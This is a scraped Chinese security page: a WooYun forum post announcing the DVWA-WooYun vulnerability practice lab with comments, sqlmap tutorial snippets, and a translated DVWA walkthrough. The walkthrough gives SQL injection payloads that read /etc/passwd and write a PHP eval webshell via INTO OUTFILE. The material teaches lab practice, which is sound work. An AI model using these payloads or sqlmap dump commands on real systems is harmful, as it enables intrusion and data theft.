dvwa安装教程是啥

当前位置:& &&
DVWA-WooYun(乌云靶场)开源漏洞模拟项目 测试版公布!
评论: 0|原作者: 自学去|来自: 自学去
DVWA-WooYun(乌云靶场)开源漏洞模拟项目 测试版公布!
lxj616 (简介) |
DVWA-WooYun开源漏洞模拟项目 测试版公布!
0x00:前言
DVWA-WooYun是一个基于DVWA的PHP+Mysql漏洞模拟练习环境,通过将乌云主站上的有趣漏洞报告建模,以插件形式复现给使用该软件的帽子们,可以让乌云帽子们获得读报告体验不到的真实感,在实践的过程中可以无缝隙地深入理解漏洞的原理及利用方式。
中英双字,如果您语文学的不好不必担心了,界面提示英文的(DVWA原厂),内容提示中英双字(后来觉得比较眼花,所以去掉了部分英文)。
开放源代码(遵守GPL),有源码有真相!
下载地址:
SourceForge.net:
百度网盘:,提取码:xtr8
0x01:使用方法
和DVWA完全一样,不过我们这个版本只有安全等级为low的页面,一般都是直接先点view source看源代码,如果你觉得你黑盒就能Fuzz出每一个插件的过滤函数etc,那可能会浪费一定的时间。我们每一个插件都带着view help帮助提示,如果view source仍然不理解的话就点它吧,最后我们的插件中都明确标出了原始漏洞报告的链接,如果有drops乌云知识库文章的话也会标出,如果连view help点完都不理解的话就到原漏洞报告帖去膜拜一下吧,啊哈哈哈哈哈
安装说明:它会自己提示,如果没有自动提示请访问/setup.php,默认账号admin,默认密码password
0x02:已有的插件目录(20个)(实际比20个多,有一些模拟效果不理想的保留在了里面)
其中比较典型的有 心伤的瘦子[腾讯实例]系列XSS、各种过滤函数bypass、二次注入、正则表达式逻辑、运行流程控制等
目前自评插件技术强度为中等(需要一定基础,都是现实而非过度YY的实际案例,但毕竟是原理性重现,因此高手看了仍然会觉得其实早都见过无数遍了)
《上传文件的陷阱》Flash上传CSRF模拟效果非常不理想,以后再改进吧
其对应的乌云漏洞报告分别为
0x03:插件编写说明
如果各路大牛认为自己(或身边大牛)的漏洞思路足够新颖可以让所有帽子们感受一下,也可以自行编写插件添加到我们的DVWA-WooYun中,下面为插件编写说明
插件的编写方式:
// 首先在/DVWA/includes/dvwaPage.inc.php添加首页标题
function dvwaHtmlEcho( $pPage ) {
$menuBlocks = array();
$menuBlocks['home'] = array();
$menuBlocks['home'][] = array( 'id' =& 'home', 'name' =& 'Home', 'url' =& '.' );
$menuBlocks['home'][] = array( 'id' =& 'instructions', 'name' =& 'Instructions', 'url' =& 'instructions.php' );
$menuBlocks['vulnerabilities'] = array();
$menuBlocks['vulnerabilities'][] = array( 'id' =& 'WooYun-', 'name' =& 'CSRF #01-Flash Upload', 'url' =& 'vulnerabilities/WooYun-/.' );
………………省略若干………………
//在此添加首页的标题
$menuBlocks['vulnerabilities'][] = array( 'id' =& 'WooYun-', 'name' =& 'XSS #01-GBK', 'url' =& 'vulnerabilities/WooYun-/.' );
//然后就在/vulnerabilities里面随便复制一个文件夹(插件)按照里面的格式改就好了
0x04:BUG处理
由于部分XSS对于浏览器有要求,请关注内容提示的浏览器要求,即使照要求做了我也不能保证你们一定能见到弹出的窗,各种不弹窗请勤换浏览器更新flash试试吧
数据库表结构和DVWA的一模一样,整个应用均使用且仅使用SELECT命令,如果出错直接按照DVWA重新建表即可
如果发现 插件 & view help有各种错误,欢迎各种反馈
0x05:关于Solution
请直接点击view help,然后查看原始漏洞报告,欢迎讨论其它solution
0x06:声明&致谢
Lxj616在乌云各种翻箱倒柜,搜刮了20个又有教育意义又容易模拟的漏洞报告,报告均已对公众公开并已经修复,感谢DVWA团队,没有他们的DVWA我不会这么轻松地完成漏洞的模拟,感谢乌云白帽漏洞报告者,他们的技术值得所有人学习
最后,测试版可能存在大量BUG,欢迎大家多提宝贵意见~
各种吐槽:
骚动侠 (专业灌水五十年) |
猪猪侠 (A) |
赞,需要大量的人员参与才会变得更有意义
0x_Jin (世上人多心不齐) |
赞,希望作者会一直更新 持续不断的收录wooyun上 那些代表性的漏洞
从容 (有生之年报答帮过我的人,并有能力去帮助需要帮助的人) |
卧槽,牛逼
感谢一下~~! 大赞!
索马里的海贼 |
好激动。。1/20貌似有我
@xsser 我明明有WB 怎么感谢不了。。 说乌云币不足呢。。?
LeadUrLife |
xsser (十根阳具有长短!!) |
@Croxy 数据没同步
小胖子 (z7y首席代言人) |
这个牛逼,非常支持
zeracker (多乌云、多机会!) |
赞,等数据同步后,再点赞,奖励1WB。:) 楼主辛苦了
从容 (有生之年报答帮过我的人,并有能力去帮助需要帮助的人) |
@zeracker 抠门,才1wb,我奖励两个!
白非白 (这是什么(t_t))?(谢感边右) |
这个真的可以有。
袋鼠妈妈 |
好牛鼻!!!
mramydnei |
点赞 祈祷洞主真的能受到开源协议的保护
xiaoL (http://www.xlixli.net) |
楼主好样的!
索马里的海贼 |
@mramydnei怨妇。。。 人在做天在看 天X座不会有好结果的
随随意意 (fuck:9999) |
网盘分享密码是什么
楼主为啥不用 GitHub ?
lxj616 (简介) |
@随随意意 xtr8 也可以到sf下载
lxj616 (简介) |
@0xCC 表示web类的还是不习惯用github
kwokwing |
给力,赞一个
随随意意 (fuck:9999) |
xtr8。 ok。。。
从容 (有生之年报答帮过我的人,并有能力去帮助需要帮助的人) |
@随随意意 xtr8
chock (为什么我的感谢按钮点不了) |
我以为汉化了呢
HackPanda |
必须给力,大赞
ling (对方正在浏览色情网站.) |
@xsser 我的“编辑漏洞”更新能不能通过?
随随意意 (fuck:9999) |
本菜鸟有可以偷偷学点武功秘籍了
/fd (Http://prompt.ml) |
luwikes (土豆你个西红柿,番茄你个马铃薯~~~) |
zzR (你说我不能笑- -!) |
太赞了,这个有意思
loli (带你装逼带你飞) |
Mujj (Krypt VPS特价) |
/login.php 已经架好了,欢迎来用。
雨路 (我曾经号称酒王,一个晚上对付三十几个,喝伤 15个,喝趴下16个,失踪4个。令无数人闻风丧胆!不管是夺命大燕京.还是雪花绿巨人,倒满必干!! 但现在我为何退出江湖,归隐深山?两瓶就倒,三瓶就断片?是什么让我改变如此之大!?是仇恨?还是爱情? 拿起你的手机,编辑短信“我要陪你吃夜宵”发送到本人手机。与昔日酒王面对面交流,倾听酒王背后的故事,感受酒王曾经的辉煌,揭开酒王背后的心酸……) |
(统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) |
存在敏感词 (昵称存在敏感词) |
1024个赞!!!
耍了一会~~再来赞多一次!
让一让 开水烫 想不烫的点感谢啊!
Melody (欢迎搞基,妹子优先.丘丘) |
我来找快乐 (我来找快乐,你值得拥有) |
....那个logo敢在小点么
小火苗 (好好学习,天天向上) |
好东西。!
cooFool (没有关系,我只是来看海。) |
!!!!好
本文“”,来自:,本文地址:,转载请注明作者及出处!
上一篇:下一篇:SQLMAP 标签_51CTO技术博客
搜索推荐文章
搜索原创文章
搜索近期文章
&&&&此文章写的不错:http://pnig0s/402775推荐sqlmap官网:http://sqlmap.org//sqlmapproject/sqlmap/zipball/mastersqlmap的运行需要python环境。直接到官网下载安装即可。下载2.7.8版本,链接如下:https://www.python.org/downloads/..
&&&&插件下载地址:/p/gason/downloads/list启动方法:java-classpathgason-0.9.5.jar:burpsuite_free_v1.5.jarburp.StartBurp参考文献1:/sqlmap-burp-plugin-2/参考文献2:/?p=2471&lang=ensql..
&&&&./sqlmap.py-u'目标网址'./sqlmap.py-u'目标网址'--dbs-v0显示数据库./sqlmap.py-u'目标网址'-D数据库--tables查表./sqlmap.py-u'目标网址'-D数据库-T表--columns列./sqlmap.py-u'目标网址'-D数据库-T表--columns--dump导出注入分法不同,种类不同,来个简单的分类:1.get型:sqlm..
&&&&1、搭建Python2.7.X和SQLmap环境;2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“/artists.php?artist=1”;3、使用sqlmap获取当前数据库名称sqlmap.py-u"/artists.php?artist=1"--current-db运行结果如下:4、使用sq..
&&&&最近一直在用sqlmap暴库啥的,对sqlmap的用法一直用的比较少,今天用实例在演示一下强大的注入工具sqlmap的基本用法。。。。简单介绍:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQ..
&&&&1、官方网站下载SQLMAP:/sqlmapproject/sqlmap/tarball/master2、解压sqlmapproject-sqlmap-0.9-d20.tar.gz3、将sqlmapproject-sqlmap-0.9-d20目录里面的sqlmapproject-sqlmap-76a0d20文件夹改名sqlmap移动到/usr/bin/目录4、执行python/us..
&&&&1.sqlmap简介:sqlmap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。2.SQLMAP命令详解:O..
&&&&sqlmap简介:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功..
&&&&1、通过sqlmap进行注入攻击:root@bt:/pentest/database/sqlmap#pythonsqlmap.py-u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=fws_guest=;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'2、通过sqlmap获取数据库名:roo..
&&&&SQLMAP,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包..
&&&&BT5下使用SQLMAP入侵演示0:06:49来源:colgator'sblog简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理S..
&&&&SQL注入神器sqlmap最新版,将网上提供的英文版和中文版直接打包在此(需事先安装python环境),供爱好者下载。
1、直接解压,执行其中的sqmEN.pyw为中文版,sqm.pyw文英文版界面。
2、目录包含个人搜集的sqlmap使用帮助。
3、包含个人搜集的对sqlmap注入点判断的原理分..
&&页数 ( 1/2 )
Copyright&
版权所有 未经许可 请勿转载这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA(渗透测试演练系统).对于SQL注入利用,有以下几个基本步骤:
1,发现SQL注入点;
2,通过mysql数据库帮助,进一步进行注入,获取帐号密码等敏感信息;
3,上传webshell,获得一个反向连接。
本文所有的演示都是在DVWA(Dam Vulnerable Web Application)环境演示,DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞. 安装好之后,我们在本文的演示中需要设置脚本安全级别为low(低)。
1.发现SQL注入点
识别SQL注入是关键的一步,它需要大量的技能和经验来确定注入点。通过适当的分析应用程序,可以判断什么地方存在注入点。在下面的屏幕截图所示,“ID”字段中可能会受到SQL注入。程序功能需要一个整数做为用户输入,提交之后会显示该ID对应的姓名。
当我们在用户ID中加一个单引号(‘),会看到产生了数据库的报错,本次演示使用的是mysql数据库。
之所以产生错误是因为,输入的用户ID中,单引号不是一个整数类型的,导致后端SQL查询产生了错误,可以想象一下后端SQL查询语句大概是这样:
Mysql&select first_name,last_name from users where user_id=”;
如果输入变成了非整数类型的单引号,SQL语句就会变成如下:
MySQL& select first_name, last_name from users where user_id=”’ ;
因此,产生了一个语法错误,所以注入点被确定为id字段。前端的该语句是会在后端的sql服务器进行执行的,这将使sql注入变为可能。
2,通过mysql数据库帮助,进一步进行注入,获取帐号密码等敏感信息;
进一步尝试猜测后端查询语句,从而获取mysql版本、数据库名称、列数等,通过前端的报错等我们猜测后端的查询语句是这样的:
Mysql&select first_name,last_name for user where user_id=1;
以上只是胡乱猜测,我们需要通过mysql语句更进一步的进行测试,开始使用order by 。order by 语句可以对查询结果进行排列,上面的语句中有两列,使用order by 语句可以按照第一列first_name或者第二列last_name对结果进行排列。假如我们想根据第三列对结果进行排序,因为查询语句中不存在第三列,就会产生报错:
ERROR ): Unknown column ’3′ in ‘order clause’
当我们使用order by 2的时候没有产生任何错误,而使用order by 3的时候产生报错,说明数据库中只有两列;通过这种方法我们可以使用order by语句猜测数据库表中的列数。
user id输入’ order by 3+–+的时候,后端SQL查询语句如下:
Mysql&select first_name,last_name from user where user_id=”order by 3+- -+’
可以看到因为不存在第三列会产生报错。
user id输入’order by 2+–+的时候,后端查询语句如下:
Mysql&select first_name,last_name from user where user_id=”order by 2+- -+’
可以看到没有产生任何错误。
接下来进一步使用union查询语句
为什么要使用联合查询?
Union查询结合了两个select查询结果,根据上文中的order by语句我们知道查询包含两列,为了能够现实两列查询结果,我们需要用union查询了结合我们构造的另外一个select.注意在使用union查询的时候需要和主查询的列数相同。
MySQL& select first_name, last_name from users where user_id=”union select 1,2 ;
使用union select之后可以看到查询结果显示在了页面上.
继续构造union select语句,来查询正在使用中的用户和数据库,用以下语句
‘union select user(),database()+- -+
‘union select session_user(),current_user()+- -+
‘union select 1,version()+- -+ 查询数据库的版本。
使用联合查询语句构造,利用注入读取/ect/passwd 文件(linux系统)
‘UNION SELECT 1, load_file(/etc/passwd) +- -+
使用联合查询语句构造,利用注入读取c:\1.txt (Windows系统)
‘ UNION SELECT 1, load_file(‘c:\\1.txt’) +- -+
‘ union select 1, load_file(‘c:\/1.txt’) +- -+
3.利用sql注入写入webshell
假设我们通过phpinfo文件知道了网站的物理路径,接下来我们通过使用union select语句来写入webshell.写入需要你有写入权限等。
‘ union select 1,’&?php eval($_POST[cmd]);?&‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ +- -+
‘ union select 1,’&?php eval($_POST[cmd]);?&’ into outfile ‘c:\\2.php’+- -+
本文中用到的DVWA(渗透测试演练系统):
帐号密码: admin password,
暂时因为环境不支持sql injection漏洞的演练。
DVWA下载:/tools/DVWA-1.0.7.zip
翻译自国外网站,请尊重劳动成果,转载注明出处!
Related Posts
转载请注明: &
本文作者:

我要回帖

更多关于 sqlmap dvwa 的文章

 

随机推荐